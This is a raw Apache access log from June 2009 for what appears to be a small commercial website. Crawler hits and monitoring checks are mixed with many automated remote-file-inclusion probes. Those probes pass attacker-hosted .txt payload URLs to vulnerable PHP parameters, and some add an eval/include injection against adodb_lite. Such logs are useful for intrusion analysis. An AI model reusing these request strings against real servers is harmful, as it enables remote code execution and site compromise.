209.59.12.99 - - [28/Jun/2009:02:54:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.245 - - [28/Jun/2009:02:56:50 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:02:57:07 -0400] "GET /logs/access_log.Q108010400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.94.6.3 - - [28/Jun/2009:02:57:24 -0400] "GET /logs/access_log.Q109053100//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:02:59:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.73 - - [28/Jun/2009:03:00:28 -0400] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:03:00:28 -0400] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:03:00:28 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:03:00:34 -0400] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:03:00:34 -0400] "GET /logs/access_log.Q109060300%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:03:00:35 -0400] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
151.1.219.156 - - [28/Jun/2009:03:00:50 -0400] "GET /logs/access_log.Q109061600%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
151.1.219.156 - - [28/Jun/2009:03:01:05 -0400] "GET /logs/access_log.Q109052600%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:03:03:00 -0400] "GET /logs/error_log.Q109062700 HTTP/1.0" 200 2469083 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.179 - - [28/Jun/2009:03:03:01 -0400] "GET /logs/error_log.Q109062700 HTTP/1.0" 200 2469083 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.179 - - [28/Jun/2009:03:03:25 -0400] "GET /scripts/browser_ee.js HTTP/1.0" 200 10423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [28/Jun/2009:03:04:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.177.9.20 - - [28/Jun/2009:03:07:15 -0400] "GET /logs/access_log.Q109060900//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:03:09:09 -0400] "GET /logs/access_log.Q108081600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [28/Jun/2009:03:09:10 -0400] "GET /images/items/682414_full.jpg HTTP/1.1" 200 6412 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [28/Jun/2009:03:09:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.115.58.73 - - [28/Jun/2009:03:09:13 -0400] "GET //main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:09:13 -0400] "GET /logs//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:09:13 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:09:20 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:09:22 -0400] "GET //main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:09:22 -0400] "GET /logs//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:09:22 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:09:35 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:09:38 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:09:38 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:03:09:56 -0400] "GET /logs//main.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:03:09:56 -0400] "GET //main.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:03:09:56 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:00 -0400] "GET /logs//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:00 -0400] "GET //main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:00 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:03:10:01 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:04 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:09 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:09 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:16 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:10:16 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:26 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:26 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:26 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:30 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:30 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:10:30 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
81.177.9.20 - - [28/Jun/2009:03:11:44 -0400] "GET /logs/access_log.Q109060900//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:03:14:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.38.0.130 - - [28/Jun/2009:03:15:03 -0400] "GET /logs/access_log.Q109053100//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:15:58 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:16:03 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:16:53 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:16:54 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:03:19:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.245.84 - - [28/Jun/2009:03:19:22 -0400] "GET //skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
87.106.245.84 - - [28/Jun/2009:03:19:22 -0400] "GET /logs//skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.150.78.245 - - [28/Jun/2009:03:20:24 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:03:20:54 -0400] "GET /modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:03:20:54 -0400] "GET /logs/access_log.Q109062500/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:03:20:54 -0400] "GET /logs/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:03:21:13 -0400] "GET /logs/access_log.Q108050700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.195.48 - - [28/Jun/2009:03:23:25 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.0.0; YPC 3.2.0; (R1 1.5))"
212.83.2.61 - - [28/Jun/2009:03:23:58 -0400] "GET //skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
212.83.2.61 - - [28/Jun/2009:03:23:58 -0400] "GET /logs//skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
201.38.0.130 - - [28/Jun/2009:03:24:04 -0400] "GET /logs/access_log.Q109060900//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.86.176.98 - - [28/Jun/2009:03:24:04 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.176.98 - - [28/Jun/2009:03:24:04 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.86.176.98 - - [28/Jun/2009:03:24:05 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
209.59.12.99 - - [28/Jun/2009:03:24:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [28/Jun/2009:03:24:34 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:25:06 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:25:14 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:25:14 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:25:14 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.241.249.222 - - [28/Jun/2009:03:25:23 -0400] "GET /bbs/outlogin.php?_zb_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:25:29 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:25:36 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:26:09 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:26:09 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:03:26:12 -0400] "GET /logs/access_log.Q108021700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.86.176.98 - - [28/Jun/2009:03:26:26 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
123.242.165.138 - - [28/Jun/2009:03:27:47 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=www.suntalent.com.tw/appserv/id???%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:03:27:47 -0400] "GET /logs/appserv/main.php?appserv_root=www.suntalent.com.tw/appserv/id???%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:03:27:52 -0400] "GET /appserv/main.php?appserv_root=www.suntalent.com.tw/appserv/id???%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:03:29:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.24.40.186 - - [28/Jun/2009:03:30:59 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.24.40.186 - - [28/Jun/2009:03:30:59 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.24.40.186 - - [28/Jun/2009:03:30:59 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
125.244.82.2 - - [28/Jun/2009:03:31:03 -0400] "GET //skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
125.244.82.2 - - [28/Jun/2009:03:31:03 -0400] "GET /logs//skin/happycast_blue/ask_password.php?dir=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
72.30.142.179 - - [28/Jun/2009:03:31:15 -0400] "GET /logs/error_log.Q109011300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.219.194.193 - - [28/Jun/2009:03:32:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; InfoPath.1)"
62.219.194.193 - - [28/Jun/2009:03:32:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; InfoPath.1)"
62.219.194.193 - - [28/Jun/2009:03:32:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; InfoPath.1)"
62.219.194.193 - - [28/Jun/2009:03:32:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; InfoPath.1)"
66.249.71.204 - - [28/Jun/2009:03:33:14 -0400] "GET /logs/error_log.Q107053100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:03:34:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
205.178.184.153 - - [28/Jun/2009:03:36:08 -0400] "HEAD /index.htm HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
205.178.184.153 - - [28/Jun/2009:03:36:08 -0400] "HEAD /ACE.html HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
205.178.184.154 - - [28/Jun/2009:03:36:08 -0400] "HEAD /Includes/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
205.178.184.154 - - [28/Jun/2009:03:36:12 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
205.178.184.153 - - [28/Jun/2009:03:36:15 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
205.178.184.153 - - [28/Jun/2009:03:36:15 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
205.178.184.152 - - [28/Jun/2009:03:36:41 -0400] "GET /logs/ HTTP/1.1" 200 7314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
205.178.184.152 - - [28/Jun/2009:03:36:41 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.30.142.179 - - [28/Jun/2009:03:36:55 -0400] "GET /logs/error_log.Q107121500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.34.78.110 - - [28/Jun/2009:03:38:06 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:06 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:07 -0400] "GET /logs/access_log.Q109051900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:10 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:10 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:11 -0400] "GET /logs/access_log.Q109051900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:13 -0400] "GET /logs/access_log.Q109053000%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:17 -0400] "GET /logs/access_log.Q109053000%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:32 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
